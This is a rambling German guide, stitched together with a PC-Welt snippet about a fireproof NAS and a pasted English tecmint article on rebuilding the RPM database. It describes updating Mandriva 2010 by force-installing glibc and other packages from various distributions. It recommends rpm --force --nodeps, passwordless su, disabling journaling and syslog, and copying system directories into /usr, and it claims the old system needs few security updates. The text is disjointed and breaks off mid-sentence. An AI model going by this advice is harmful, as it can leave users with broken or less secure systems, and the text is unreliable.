http://www.pcwelt.de/ratgeber/So_schuetzen_Sie_Ihre_Daten_vor_Katastrophen-Sicherheitskopien-8306163.html Spezielle besonders robuste Gehäuse schützen Ihre Datenspeicher vor Katastrophen. Beispielsweise können Sie Datenträger in feuerfeste Tresore einschließen. Dieser ioSafe N2 NAS ist sowohl feuer- als auch wasserfest. Das ioSafe N2 NAS wiederum ist ein Unfall-resistentes NAS-Gerät, das automatische Datenspiegelung bietet (RAID-1). Er ist sowohl feuerfest bis zu einer Außentemperatur von rund 850 Grad für bis zu 30 Minuten, als auch wasserfest bei einer Tiefe von 3 Meter für 72 Stunden. Der ioSafe N2 läuft mit Synologys DiskStation-Manager-Betriebssystem, welches die Synchronisation mit einem zweiten Synology-NAS oder einer Cloud unterstützt.
Mit sdd anstelle dd wird auch ein Fortschrittsbalken angezeigt. Folgende Distributionen eignen sich für mdv2010 zum Updaten: omv2015, rosa2014.1, mga, fc, el7 and el6 and OpenSuSE 13.2/42/43. Die msec-Variable "allow-root-login" sollte während des Updatens den Wert "yes" aufweisen, um Bash-Kommandos garantiert ausführen und Pakete besser entfernen und installieren zu können. Die Sektion "Partitionsweise 1:1-Sicherung mit dd von Rettungs-DVD/CD bzw. von einem USB-Speicherstift mit Linux aus erstellen" sollte verstanden worden sein: kein Updaten ohne (externes) Sicherungsmedium, kein Sichern und Wiederherstellen ohne einen zuverlässig auf (auch verschlüsselten) Partitionen arbeitenden Befehl wie "dd"! Ein Ziel ganz am Ende allen Updatens ist, das Journalling der Linux-Dateisysteme wie reiserfs, ext4 und ext3 abzuschalten, die Root-Partition read-only zu benutzen, "allow-root-login" wieder auf "no" zu setzen und das Syslog abzuschalten oder Logdateien ins temporäre Verzeichnis /tmp auf SHM (im RAM) umzuleiten. Das werden wir am Schluss dieser Sektion "Aktualisieren/Updaten" für reiserfs tun. Mdv2010 (bzw. mdv2011) lassen sich prima mit Paketen von CentOS 6, CentOS 7 und Rosa 2014.1, gelegentlich Rosa2012 auf den aktuellen Stand bringen, Ausnahme bleibt die Abhängigkeit von KDE mit Plasma, Akonadi, Nepomuk (mdv2010: Version 4.4.5) und MySQL (mdv2010.2 oderr rosa2012.1, dazu später). KDE kann geschlossen geupdatet werden, was aufgrund zahlreicher Pakete recht aufwendig ist und einige wenige einzelne Pakete. Im Prinzip sind die Releases zu einer bestimmten Paketversion der Distribution wie Mandriva 2010 auf Funktionstüchtigkeit hin bereits in der Reihenfolge mdv2010.0, mdv2010.1, mdv2010.2 und mehr oder weniger mdv2011.0 fixiert worden und somit durchgepatcht, ähnlich wie das 2010 und somit zeitgleich freigegebene el6 und el7, im letzten Fall (el6) nicht wie mdv nur über zwei Jahre, sondern von Jahr 2010 bis Jahr 2026. Klappt immer noch nicht alles, eignen sich Vorgänger und Nachfolgeversionen anderer Ausgaben, omv, rosa, mga, fc, el7 und el6. Unten vorgestellte Updatepakete von el7 und el6 führen zu einem bis zum Jahr 2026 aktuellen und durch und durch funktionstüchtigem universellem UNIX/Linux. Ausnahme bleibt hier nur das zweifach geupdatete KDE-4.4.5 resp. 4.4.9 (mdv2010.2). Dieses kann man nach einer kleinen Maßnahme beibehalten oder man besorgt sich KDE (omv2015) oder KDE 4.14 von Mandriva-Nachfolger Rosa2014.1 von pkgs.org. Vor der Installation unten aufgelisteter Updates (el6) behalte man die Vorgänger-Pakete stets in einem Verzeichnis parat. Die Installation mit den rpm-Optionen --force und sogar --nodeps nach dem misslungenen Versuch einer herkömmlicher Installation wirkt sich dann bei Nachgang noch benötigter Pakete nicht negativ aus. mdv2010 und LInfw3 machens möglich, wenn auch glibc, Browser, bash und OpenSSL unbedingt geupdated (gepatcht) werden sollten. Denn alle Netzverbindungen (auch die aktivierten Dienste und Server bzw. kommunikativen Prozesse oder auch Kommunikationprotokolle darunter etwaige Trojaner) müssen von niemandem denn dem passwortgeschützten Benutzer "surfuser" und Gruppe "surfgroup" gestartet, aufgebaut und somit besessen werden. Linfw3 blockt alle anderen Benutzer und Gruppen und somit einschließlich root. Hinzu kommen bei Linfw3 gezielte Portfreigaben (Ports stehen dabei für jeweils aktivierte Dienste). Chrooten ist ja außerdem zu untersagen und "surfuser" außer in der Gruppe "surfgroup" nirgendwo MItglied, auch nicht in der zwecks Einloggen als root durch Einstellungen vorauszusetzendenWheel-Gruppe. Mittels Wheel-Gruppe lässt sich über MCC Sicherheit für root sogar ein viel Zeit ersparender, passwortloser Zugang über "su" konfigurieren. Das Risiko hält sich wegen UID-Owner surfuser und GID-Owner von Linfw3 dann trotzdem in Grenzen. Obendrein kann man zur Verhinderung jeglicher Ausführung von Programmen (darunter etwaige Malware) sogar noch die Option "noexec" in der Gerätekonfigurationsdatei /etc/fstab auf die Partitionen wie hier die vom Benutzer surfuser besessenen Dateien einrichten. Gezielte LAN-Freigaberegelungen und insbesonders Zugriffsrechte auf Verzeichnisse und Dateien (chown non-surfuser; chmod 700) können sensible Informationen lesegeschützt verbergen, ganz im Sinne der Unschlagbarkeit der Architektur der UNIX-(Datei-)systeme! Inwiefern sich die wohlgemerkt ausschließlich passwortgeschützt unter "surfuser" aktivierten Dienste und somit zugehörige Kommunikatiosprotokolle auswirken können, regeln diese über Richtlinien und ihren Code selbst. Wer ganz vorsichtig sein möchte, verschiebe alle sensiblen Daten (Dateien) ohne oder zumindest mit erschwerter Wiederherstellbarkeit in eine (neben der root-Partition) verschlüsselte Partition oder auf ein extern verschlüsseltes Speichermedium und achte dann beim Anschluss darauf, dass suspekte Dienste deaktiviert sind. Aber auf all das kommen wir noch in der Beschreibung von Linfw3 zu sprechen. Dennoch wollen wir auch über diese Sicherheit hinaus gern auf weitere Nummer sicher über Nummer sicher gehen. Wir beschreiben daher, wie mdv2010 auf einfache Art und Weise trotz hervorragender Laufeigenschaften sicherheitstechnisch auf den allerneuesten Stand gebracht werden kann: vor allem dank des bis zum Jahr 2026 mit Updates versorgenden Scientificlinux alias CentOS el6 bzw. el7. el6 ist das Kürzel für Pakete von CentOS, gefolgt von Repoforge (RPMforge), Scientific Linux, ALT Linux, ATrpms Testing, Atomic, NauLinux School, Nau Linux Extras, LinuxTECH, PN Testing und weiteren Distributionen. Updategarantie (el6): Jahr 2010 bis Jahr 2026 Updatequellen (el6, el7): http://fr2.rpmfind.net (FTP-downloads, hier für el6, el7, fc, mdv und mga) und http//pkgs.org (http-Downloads für el6, el7, fc down to fc xx, mga down to mga xx), http://rpm.pbone.net/ (http- and ftp-downloads, el6, el7, alle bekannten Distributionen und Versionen) Updates (el6.7, el7, rosa2014.1) (1): http://rpm.pbone.net/index.php3/stat/14/idka/262900/datan/2015-10-11 Updates (el6.7) (2), aktuell, neueste Updates werden ein bis zweimal die Woche gelb mit "NEW" markiert: http://fr2.rpmfind.net/linux/RPM/centos/updates/6.7/x86_64/Unknown.html aktuelle Updates (el6.7) (3): ftp://ftp.scientificlinux.org/linux/scientific/6rolling/x86_64/updates/security/ https://security.gentoo.org/glsa/ (Gentoo), 20.09.2015, https://infra-status.gentoo.org/: "Web Services Maintenance The following web services are currently unavailable: security.gentoo.org (GLSA) piwik.gentoo.org (this will cause other gentoo websites to exhibit a ´never stops loading´behavior) overlays.gentoo.org We expect the services to return shortly." http://www.pro-linux.de/sicherheit/1/1/1.html (CentOS el6, CentOS el7). BEACHTE: dort für unterschiedliche Distributionen täglich aufgefürhte Updates / Aktualisierungen beziehen sich nicht wie dort angegeben nur auf eine sondern i.a. immer auf ALLE DISTRIBUTIONEN (JEWEILS), in unserem Bsp. mdv2010.2 (CentOS el6, el7, rosa2014.1). Sie sind für el7 und el6 meist von pkgs.org erhältlich. Die für unabsehbar viele Jahre verfügbare Updatequelle schlechthin für mdv wie 2010.0 lautet : ftp://fr2.rpmfind.net/linux/Mandriva/official/2010.0/x86_64/media/contrib/release und für mdv2010.1 und mdv2010.2 ftp://fr2.rpmfind.net/linux/Mandriva/official/2010.1/x86_64/media/contrib/release oder ftp://fr2.rpmfind.net/linux/Mandriva/official/2010.1/x86_64/media/contrib/updates. Sie sollte im MCC (drakconf) unter Updatequellen/Aktualisierung fest eingetragen werden, so dass über Klick auf "Software hinzufügen bzw. Aktualisieren" die hdlist.cz und somit die Pakete von eben diesen Quelle heruntergerladen werden können, ggfls. auch einzelweise. Ein Blick ins Changelog eines jeden Pakets gibt Auskunft über alle inhaltliche Änderungen gelistet nach Datum mit Wochentag, Uhrzeit, Name bzw. E-Mail-Adresse des jeweiligen Autors (Programmierer) der Änderung sowie eine Kurzbeschreibung der Änderung selbst. Diese werden von der verwaltenden bzw. publizierenden Organisation auf Tatsachengetreue hin mit Tools wie diff überprüft. Geupdatete bzw. gepachte Pakete erkennt man bei el6 und el7 an einer hohen Release-Endnummer möglicher Weise gröszlig;er eins wie bspws. "-99" wie beispielsweise der NetworkManager und bei Mandriva außerdem an der Anzahl von Mandriva insgesamt freigegebener (publizierter) Patches (einer Version) hinter dem Punkt am Ende der Versionsnummer wie bspws.Punkt 2 bei Paketname-mdv2010.2.x86_64.1.2.1-3.2. Unterschiede in den ersten Versionsziffern lassen auf grundsätzliche oder schwere Veränderungen schließen, das Paket möglicherweise nicht verwenden zu können. Unterschiede in nur den letzten Versions(end)ziffern (i.a. hinter dem ersten, noch besser hinter dem zweiten Punkt) im Vergleich zur Versionsnumer des bereits installierten Pakets gleichen Namens erhöhen hingegen die Wahrscheinlichkeit der funktionalen Verwendbarkeit des vorgestellten Pakets im Vergleich zum installierten beträchtlich. Legt man sich die Pakete sorgsam zurück, kann man hier und da schon mal Pakete anderer Distributionen ausprobieren, wenn auch nicht allesamt. Vor der Versionsnummer steht oft noch der Kurzname der Distribution, gefolgt vom genauen Prozessortyp (Mainboard) oder "noarch", falls davon unabhängig (jeder Prozessortyp und somit jedes Mainboard?). An dem Paket kann Vorgestellte Updatepakete führen zu einem bis zum Jahr 2026 aktuellen und durch und durch funktionstüchtigem UNIX/Linux . Ausnahme bleibt hier nur das zweifach geupdatete KDE-4.4.5/4.4.9 (mdv2010.2). Bei der Installation unten aufgelisteter Updates (el6) behalte man die Vorgänger-Pakete stets in einem Verzeichnis parat. Die Installation mit den rpm-Optionen --force und sogar --nodeps wirkt sich dann bei Nachgang noch benötigter Pakete nicht negativ aus. Beachte: Bei mangelndem Nachkommen von Paket-Abhängigkeiten kann es bereits beim Installieren des Pakets zu Ausfällen bei CPU -und-Speicher kommen, Auslastung bewirken und somit die Dauer der Installation ins Unendliche verlängern. In diesem Fall sollte man unbedingt noch einmal den Abhängigkeiten nachgehen. mdv2010 läuft dank des von Mandriva vorgenommenen Release-Cares einer festgenagelten Version eines jeden Paketes nach einem Update des Systems ausgesprochen stabil. Dennoch, um Abstürze und Hangups zu verhindern, sollte trotz all der Möglichkeiten nach dem Upgrade der glibc (auf el8, pclos, rosa2014.1 oder mga3) wie der Paketmanager mitgedacht werden. Unpässliche Versionen und fehlende Bibliotheken und falsche Pakete können sich (vorübergehend) fatal auswirken, vorübergehend dann, werden die ursprüglich installierten zum Rückgängig machen der Paketinstallationen (mit rpm -U --force und/oder --nodeps) bereit gehalten. Bootloader unseres FSE-System: grub (rosa2014.1, el6, mdv2010.2) 29. Oktober 2014, 08:49 Uhr, heise open "Die neue Version der bis Ende 2026 gepflegten Linux-Distribution verbessert die Hardware-Unterstützung. ... . Das CentOS-Team hat Version 6.7 seiner Linux-Distribution freigegeben. Wie üblich ist es ein Nachbau aus den Quellen eines Red Hat Enterprise Linux (RHEL) mit derselben Versionsnummer, das Red Hat vor zwei Wochen veröffentlicht hat. Das neue CentOS enthält daher alle Verbesserungen der Vorlage, darunter eine Reihe neuer und aktualisierter Treiber, ein Device-Mapper-Target zum Einbinden einer SSD als Cache für langsame Datenträger und die Integration der bisher aufpreispflichtigen Erweiterung für High Performance Networking (HPN). Wie üblich ist CentOS kostenlos verfügbar, verspricht volle Kompatibilität zur Vorlage und wird genauso lange gepflegt; das bereits einige Jahre alte CentOS 6 soll daher noch bis zum 30. November 2026 mit Sicherheitskorrekturen versorgt werden. CentOS 6.7 und 7.1 ist der zweite Nachbau von RHEL 6.6, denn Oracle hat das ebenfalls darauf basierende Oracle Linux 6.6 bereits vor einigen Tagen freigegeben." Für rpm filesystem von glibc > 16 beziehen wir uns auf el8 und el7 statt el6. Gentoo-GLSA liefert einen Überblick über für Linux in Frage kommende Updates auf https://security.gentoo.org/glsa/. Typische Updatefälle sind Arbitrary code execution, Multiple vulnerabilities, Denial of Service und Information disclosure. Um die meisten der aufgelisteten Updates installieren zu können, bedarf es der Aktualisierung der glibc. Updaten Sie beispielsweise nicht tcl, tk, tkinter und cpio von fc24 (rpm-Pakete lassen sich danach nicht mehr von Tar-Archivern öffnen) und Pakete eher einzelweise denn alles auf einmal, um fehlgeschlagene Updates wieder rückgängig machen zu können. In solchen Fällen probiere man die zughörigen Tarballs. Wie gesagt, die meisten Updates wie auch tar, bzip, freetype rpm von fc24, openssl (Tarball), usw. funktionieren. Ansonsten sind die Updates zur Distribution wie ftp://fr2.rpmfind.net/linux/Mandriva/official/2010.1/x86_64/media/contrib/updates für bspws. mdv2010.1 und mdv2010.2 unter einigen wenigen, noch aufgeführten Ausnahmen, völlig ausreichend. Überhaupt stellt fr2.rpmfind.net eine prima Bezugs- und Updatequelle für verschiedenste Linux-Distributionen (außer Debians deb-Pakete) da. In jedem Fall, insbesonders bei Bezug auf die Liste von Gentoo-GLSA, sollte das gesamte System vor dem Updaten gesichert werden! In allen bei mdv2010 nicht bekannten problematischen Einzelfällen kann man sich bei im Internet und der Newsgruppe alt.linux.suse erkundigen. Linux wird funktional ständig erweitert und somit auch die Bibliotheken. Paket-Versionen ändern sich mit der Distribution. Damit eine Linux-Distribution fehlerfrei läuft wie in unserem Beispiel Mandriva 2010, verwende man ein Linux-freundliches Mainboard und installiere darauf nur Pakete (und Tarballs), die zur eingespielten Version einer nicht vor 2004 erschienenen, umfassenden Distribution gehören, in unserem Fall enden sie namentlich immer mit mdv2010. Erst nach einem Upgrade der glibc sowohl x86_64 als auch i586 für i586-Software, auf die höhrere Version (falls möglich) wie in unserem Beispiel mdv2011 kommen u.U. auch Pakete anderer oder höherer Versionen der Distribution in Betracht. In jedem Fall nicht zu vergessen sind, um von Fehlerfreiheit zu sprechen, natürlich entsprechenden Bezug zur Distribution und Version wahrende Update-Pakete (Version.Update-Nummer). Neben der Installations-DVD/CD eignet sich für die Suche solcher Pakete immer rpmfind.net oder der Mirror fr2.rpmfind.net. Dort sind die Pakete nach Distribution und Version genau gekennzeichnet. Der Kernel von mdv2012 ließ sich ohne weiteres für mdv2010 nutzen. Ein Kernel-Upgrade per Paket aber ist nicht immer ohne weitere Pakete im Spiel möglich. Sehen wir uns mit mdv2010 bei Rosa2014.1, Scientificlinux alias CentOS 6.7, CentOS 7 oder 8 oder Fedora Core, derzeit fc28? Obwohl also mdv2010, ob 2010.0, 2010.1 oder am besten 2010.2 nach der Installation sicher und fehlerfrei läuft und sicherlich nicht mehr der Updates bedarf, kann man mit Paketen oft auf aktuelles Linux wie derzeit bis auf Fedora Core 23 aus dem Jahr 2015 (aus möglichst vollständig installiertem mdv2010.2 heraus) hochfahren. Den Großteil der Installierten Software belasse man bei mdv2010 und installiere einzelweise nur bei Bedarf. Zu diesem Zweck installiere man mit "rpm -U --force --nodeps" lediglich eine aufschließende (abwauml;rtskompatible) C-Standardbibliothek glibc (el8, mga7, mga5 oder mdv2012) aus den Dateien: glibc, glibc-headers (el8, pclos), glib2.0-common (am schnellsten arbeitet mga7, mga5, rosa2014.1 oder die sechsfach gepachte Version von mga3 und vor allem durchgepatchtes el6), glibc-common (el8), glibc-utils (el8, mga7, mga7, el6, rosa2014.1 oder mga3), glibc-profile (am besten mga7, mga5, rosa2014.1 oder mga3), glibc-all-langpacks (el8), glibc-static-devel (el6, rosa2014.1 oder mga3), glibc-devel (rosa2014.1, mga3), glibc-i18ndata (mga7, mga5, rosa2014.1,mga3), glibc_lsb (mga3), gettext (rosa2014.1 oder mga3), gettext-base (rosa2014.1), lib64gettext-misc (rosa2014.1), lib64gettext-po0 (rosa2014.1), lib64intl8 (rosa2014.1), lib64png16 (rosa2014.1), lib64glibmm2 (mdv2010), glib-networking (el6), mm-common (mga3), libc6, lib64nspr4, lib64nss3, locales (mga7, pclos, rosa2014.1 oder mga3), locales-en, locales-de, locales.fr, locales-se, locales-jp und, wer will, noch die C++-Standardbibliothek lib64stdc++, (BEACHTE, OHNE Aktualisierung der lib64glib*, lib64gio usw) alles sowohl für x86_64 als auch i586, und schon öffnet sich für mdv2010 das große weite Tor zur rasant-schnellen Linux-Welt bis ins derzeit aktuelle fc24 hinein! Nun kann man wie beim "Fahrstuhlfahren" nach Listings von fr2.rpmfind.net meist wohl nach ganz oben oder alle möglichen "Etagen" aller möglichen Distributionen und Versionen "ansteuern". Maximal mausklick-schnell (leichtläufig) arbeiten wie beschrieben die aufgeführten Pakete der glbc von mga3. Für glibc dürfen außer den aufgeführten mga3-Paketen keine weiteren mga3-Pakete installiert werden, in vielen anderen Fällen nun ruhig auch mga3-Pakete! Bereits der MIx aus mdv2012 und mga3 bringt neben Sicherheit den entscheidenden ultimativen Tempoboost auf SSD. Um das unter mdv2012 zu installierende Einzelpaket glibc mit rosa2014.1 (bzw. el6 außer glibc-rpm) oder mga3 zu übertrumpfen, bedarf es ab glibc-2.17 der manuellen Angleichung neuer Links des Dateisystems im Wurzelverzeichnis nach siehe Paket filesystem (rpm). Sicherheitsmechanismen des Kernels verbieten jedoch entsprechende Verlinkung. Kopieren Sie am Schluss des Linux-Tunings noch gemäß dem neuen Paket filesystem von mga3 alle Dateien aus /bin nach /usr/bin, /sbin/* nach /usr/sbin/, /lib/* nach /usr/lib/ und /lib64/* nach /usr/lib64, wenn nicht, auch egal. Sicherer und schneller wird Linux danach auch künftig nicht mehr laufen. Öffnen des Tors zur großen weiten Linux-Welt: glibc (el8, mga7, mga5, rosa, mga3 und mdv2012, Rest: el6, ggfls. rosa2014.1) für x86_64 (64-Bit-CPU), analog i586 (32 Bit) und unproblematisch: glibc (el8, pclos, mga7, mga5), glibc-common (el8), glibc-headers (el8, pclos), libc6, glibc-devel, glibc-profile (mga7, mga5), glibc-utils (el8, mga7, mga5), glibc-i18ndata (mga7, mga5), glibc-all-langpacks (el8), glibc_lsb, gettext, locales, locales-en, locales-de, ..., gettext-base, lib64gettext-misc, lib64gettext-po0, lib64intl8, lib64png16, glib-gettextsize, glib-networking, glib2.0-common, lib64gio2, lib64glib-networking, lib64glib2.0, lib64glib2.0-devel, lib64glibmm2, lib64gmodule2, lib64gobject2, lib64ffi6, lib64gthread2, lib64stdc++, lib64QtGlib2.0, lib64packagekit-glib2 und prelink, glib2 (el7 oder el6, anstelle lib64gthread2 (rosa2014.1), lib64gio2 (rosa2014.1) und lib64gobject2 (rosa2014.1) Um Fehlermeldungen beim Booten zu umgehen, verlangt glibc (el8) nur noch die Entfernung der Zeile LC_TIME=de_DE.UTF-8 aus /etc/sysconfig/i18n ! Gegebenenfalls sind noch die locales (pclos, mga7, mga6) nachzuinstallieren. Wir haben uns wg. el6 und ausgezeichneter Laufeigenschaften für folgende Konstellation der GNU C Standard Library glibc entschieden: glibc (el8, pclos, rosa2014.1), libc6 (rosa2014.1), glibc-common (el8), glibc-all-langpacks (el8), compat-glibc (el6), glibc-common (el6), glibc-i18ndata (rosa2014.1), glibc-headers (el8, pclos, el6), glibc-static (el6), glibc-utils (el8, el6), glibc-profile (entfällt oder rosa2012.1), lib64glibc_lsb0 (rosa2014.1) oder glibc_lsb, locales (rosa2014.1), glib2 (el6), prelink (rosa2014.1), lib64stdc++ (rosa2014.1 und el6) oder auch alles rosa2014.1 Wie gesagt: Um Fehlermeldungen beim Booten zu umgehen, verlangt glibc (el8) nur noch die Entfernung der Zeile LC_TIME=de_DE.UTF-8 aus /etc/sysconfig/i18n ! Gegebenenfalls sind noch die locales (pclos, mga7, mga6) nachzuinstallieren. Warnung: Mit jeder glibc-Distribution gelingt das wie mit Rosa2014.1 nicht so einfach, ggfls bedarf es weiterer Pakete, die aber die Abhängigkeiten und erneut das neue Dateisystem nicht richtig erfassen. Wir wiederholen: Entscheidend ist, dass die Software schnell und sicher läuft. Nach dem Hochschrauben der glibc (auf el8, rosa2014.1, mdv2012 oder mga3) sei vielleicht als erstes an aktuelle Dateisystem-Versionen (nicht zu verwechseln mit rpm filesystem) wie e2fsprogs 1.43.2 von September 2016, lib64ext2fs oder e2fsprogs-lib und reiferfsprogs bzw. btrfsprogs gedacht oder an die von GLSA-Gentoo ermpfohlenen Updates. Nach Aufbau des eigenen Linux-Software-Universums mit unserem an für sich mdv2010)steht man vor zwei Wahlen: Entweder steht man im guten Glauben, dass die Distributionen seit mdv2010 bereits unter gleicher Distribution (+-1) und Version bis auf hier aufgeführte Ausnahmen bereits sicher geupdatet worden sind, zumal alle installierte Software stabil läuft sowie unter dem Willen, aktuelle Software weiterhin bei Bedarf nach und nach Beliebem zu aktualisieren oder man stellt sich mit ein wenig Vorsicht auf die Liste auf https://security.gentoo.org/glsa/ der aktuellen Linux-Updates der letzten zehn Jahre ab Erscheinen, im Fall mdv 2010 Jahr 2010 plus Updates 2010 und somit Jahr 2011) bis auf den akutellen Zeitpunkt kaiserlich ganz nach oben bzw. vorn der Gentoo-Liste ein, um sie bzw. Gentoo auch künftig im Auge zu behalten. Das nur grundsätzlich, denn es geht natürlich auch beides. Eine Sicherung (Backup) auf SSD oder externe Festplatte bleibt unerlässlich. Auf Basis von mdv2010, später ggfls. des bereits top arbeitenden mdv2010.2, handelt es sich unter der "Anleitung" von Gentoo Linux nun um den Betriebssystem-Mix aus Mandriva (mit 2.6-Endstufen-Kernel mit Patch5 oder 3.4.1-Kernel), ALT Linux oder auch Scientificlinux alias CentOS 6.7, Mageia Caudron 1 bis 4 und Fedora bis aktuell 24 sowie über Tarballs von BS x-beliebig, und wer will, über dpkg, apt, aptitude und synaptic, Debian einschließlich, um letztlich das, was sich in schier unendlicher Software-Spannbreite relativ unabhänig von den Distributionen vor allem Fedora und über Emulationen vieler anderer Betriebssysteme UNIX (bzw. Linux) nennt. Vom MCC-Paketmanager drakrpm downgeloadete Pakete befinden sich bei Aktivierung der Option "im Cache aufbewahren" bis zum Zeitpunkt unmittelbar nach der Installation in /var/cache/urpmi/rpm bzw. /var/cache/urpmi/partial. Sollten die vielen Paket-Abhänigkeiten einmal nicht gelöst werden, schaue man einfach in dieses Verzeichnis und kopiere die Pakete zur Nachinstallation an einen sicheren Ort. Sind die Pakete dort dummerweise schon gelöscht, kann man sie einzeln von fr2.rpmfind.net downloaden und nachinstallieren. How to Rebuild Corrupted RPM Database in CentOS, Aaron KiliJune 1, 2018 Categories CentOS 3 Comments The RPM database is made up of files under the /var/lib/rpm/ directory in CentOS and other enterprise Linux distributions such as RHEL, openSUSE, Oracle Linux and more. If the RPM database is corrupted, RPM will not work correctly, thus updates cannot be applied to your system, you encounter errors while updating packages on your system via YUM package manager. The worst case scenario is being unable to run any rpm and yum commands successfully. There are a number of factors that can lead to the RPM database corruption, such as incomplete previous transactions, installation of certain third-party software, removing specific packages, and many others. In this article, we will show how to rebuild a corrupted RPM database; this way you can recover from an RPM database corruption in CentOS. This requires root user privileges, otherwise, use the sudo command to gain those privileges. First start by backing up your current RPM database before proceeding (you might need it in the future), using the following commands. # mkdir /backups/ # tar -zcvf /backups/rpmdb-$(date +"%d%m%Y").tar.gz /var/lib/rpm Next, verify the integrity of the master package metadata file /var/lib/rpm/Packages; this is the file that needs rebuilding, but first remove /var/lib/rpm/__db* files to prevent stale locks using following commands. # rm -f /var/lib/rpm/__db* # /usr/lib/rpm/rpmdb_verify /var/lib/rpm/Packages In case the above operation fails, meaning you still encounter errors, then you should dump and load a new database. Also verify the integrity of the freshly loaded Packages file as follows. # cd /var/lib/rpm/ # mv Packages Packages.back # /usr/lib/rpm/rpmdb_dump Packages.back | /usr/lib/rpm/rpmdb_load Packages # /usr/lib/rpm/rpmdb_verify Packages Now to check the database headers, query all installed packages using the -q and -a flags, and try to carefully observe any error(s) sent to the stderror. # rpm -qa >/dev/null #output is discarded to enable printing of errors only Last but not least, rebuild the RPM database using the following command, the -vv option allows for displaying lots of debugging information. # rpm -vv --rebuilddb Now to check the database headers, query all installed packages using the -q and -a flags, and try to carefully observe any error(s) sent to the stderror. # rpm -qa >/dev/null #output is discarded to enable printing of errors only https://www.tecmint.com/rebuild-corrupted-rpm-database-in-centos/ Read Also: 20 Practical Examples of RPM Command in Linux: https://www.tecmint.com/20-practical-examples-of-rpm-commands-in-linux/ Je nach Graphikkartentreiber behalte man sich beim Wechsel von mdv2010.0 auf mdv2010.1 und mdv2010.2 den X-Server von mdv2010.0 vor. Gemeint sind alle Dateien die mit x11 namentlich beginnen. Bei dem von uns vorgestellten Modell mdv2010.0. und nicht mdv2010.2. Damit hat es sich aber schon mit dem Schwachpunkt von mdv2010. Entweder ein Programm läuft, oder es läuft nicht, d.h. es startet und führt seine Funktionen entweder aus oder nicht. Im ersten Fall sind Updates nicht zwingend erforderlich! Viele Programme finden sich namentlich bereits auf SuSE 7.3 aus dem Jahr 2003 und früher. Entscheidender IT-Sicherheitsfaktor: Der Code von UNIX/Linux ist gehörig eingesehen und "durchlesen", denn das Grundgerüst umfasst unabhängig von der Distribution immer dieselben Programme: Lilo und Grub, Kernel, dracut, cryptsetup/loop-AES, ext-2,-3 und -4 und reiserfs (neuerdings auch btrfs), glibc, X11-Server, Fenstermanager wie KDE und Gnome, Yast2 (SuSE) bzw. drakconf (mdk/mdv), gnupg bzw. kgpg, kpim mit akregator, kmail und knode, OpenOffice und koffice, kdepim (u.a. kmail), Konqueror auf Basis von kdelibs, Firefox, gimp, xine und mplayer, Clamav, bash, xterm und konsole, dialog usw., nur gelegentlich kommen weitere, darunter neue Systemprogramme und Anwendungen, hinzu, siehe Datenblatt, wiederum nach und nach jede Menge. Dabei beginnen KDE-Programme namentlich meist mit dem Buchstaben k, Gnome mit g, e für enlightment und X11 wie auch xfce4 mit x. Sie laufen aber meistens unter allen anderen Desktop-Managern, am besten unter KDE. Opensource trägt da begleitend nur zusätzlich zur Fehlerfreiheit und sicherheitstechnischen Unbedenklichkeit bei. Zwar kommt es, wie auf Gentoo.org unter GLSA aufgelistet, insbesonders aufgrund Funktionserweiterungen, vereinzelt noch zu Updates, Patches und Bugfixes - alle Treiber und fast alle Programme aber, in Abhängigkeit von der Graphikkarte, von einigen wenigen Spiele abgesehen, laufen seit mdv2007.0 mdv2010.0 (nochmal optimiert bei mdv2010.2) zumindest stabil und fehlerfrei. Nur die Plasmoide benötigen ggfls. Kontakt zur Außenwelt wie bspws. Wetterstationen. Als unsicher erwies sich ähnlich wie bei Maja Schmidt hiervon lediglich das Plasmoid Daisy. Daisy droht KDE beim Anblick ihrer gänsigen kreisrunden Schönheit von hinten schlagartig samt KDE "abzusüppeln". Der Fly-Mode des Wallpapers ist übrigends bei SMP#1 (nur einer einzigen CPU auf dem Mainboard) auf Dauer natürlich nicht zu empfehlen. Die Pakete zur Distribution wie mdv2010 sind aufeinander abgestimmt, allerdings unter im Folgenden noch aufgeführten, einigen wenigen Ausnahmen. Die aktuell gehaltenen Pakete von ALT Linux oder auch Scientificlinux alias CentOS 6.7 aus den Listings von fr2.rpmfind.net bieten sich fast immer zum Updaten an. Ein Großteil der Pakete von mdv2010 findet sich übrigends namentlich (abgesehen von der Version) bereits auf den 7 CD der in einem Kiosk erworbenen mdk10.1 aus dem Jahr 2004 wieder. Zusammen mit unserem IT-Sicherheits-Konzept (Firewall Linfw3) bedarf es daher nicht mehr unbedingt des Einspielens sämtlicher aktueller Updates, Patches und Bugfixes: can but must´nt but maybe working faster. Hingegen regelmäßig über Updates zu aktualisieren sind nun lediglich, und das ist heutzutage das Schöne bei UNIX-Systemen wie mdv2007.0 und mdv2010.0: fehlerhafte Programme (bei mdk10.1 aus dem Jahr 2004 und mdv2007.0 außer für Archivierung nicht der Fall und auch bei mdv2010.0 die Ausnahme) und alles, was Kommunikation im Netz aufnimmt wie MySQL, Proxy (Squid, ...), ggfls. Telefonie-Software, Browser (wir meinen mit dem derzeit unter den Browser-Top-10 verweilendem Firefox 3.6.13 und 3.6.17 bei Mozilla Firefox nicht unbedingt erforderlich, nehmen aber die genannte Schwäche des veralterten SSL 3.0 wie angeblich bei allen Firefox kleiner 34 zur Kenntnis; das einfache Das Updaten von Firefox wird gleich beschrieben, zunächst entpacke man höhere Versionen einfach ins Verzeichnis wie beispielsweise. /usr/lib64/firefox, analog höhere Versionen des stets aus dem Menü heraus leicht aktualisierbaren Thunderbirds!), Browser-Addons und (vorzugsweise zu deaktivierende) Browser-Plugins ( 2015: Vorsicht vor rpm-Paketen der Firma Adobe.inc, empfohlen seien stattdessen alternativ angebotene Tarballs (Zip-Archive), bzw. es besteht auch in diesem Fall Unsicherheit, so dass sich vorher ein umfassendes Backup von KDE (Konqueror) bzw. der gesamten SSD oder Festplatte empfiehlt! Derartige Probleme kommen bei mdv2010 unseres Wissens sonst aber nicht weiter vor ), Browser-Werbefilter (falls nicht bereits im Dialog mit dem Surfer), man-pages-de (an dieser Stelle empfiehlt sich die aktuellste Distribution als Quelle wie zur Zeit Margeia mga5), wget (Gnu-Software für http- und ftp-Downloads), cups direkt von cups.org mit dem Erwerb eines neuen Druckermodells, sane-backends für Scanner, Rootkit-Hunter rkhunter (und nur, um nach einer umfassenden Installation einmal mehr auf Nummer sicher zu gehen), in Nachrichten gemeldete Software mit Server-Sicherheitslücken für Server wie neulich Heartbleed, April 2014 openssl von openssl.org und (bislang in der Praxis folgenfreier) Shellshock Ende September 2014 bei bash mit Patches von http://ftp.hosteurope.de/mirror/ftp.gnu.org/gnu/bash/. In solchen Fällen kann man somit direkt 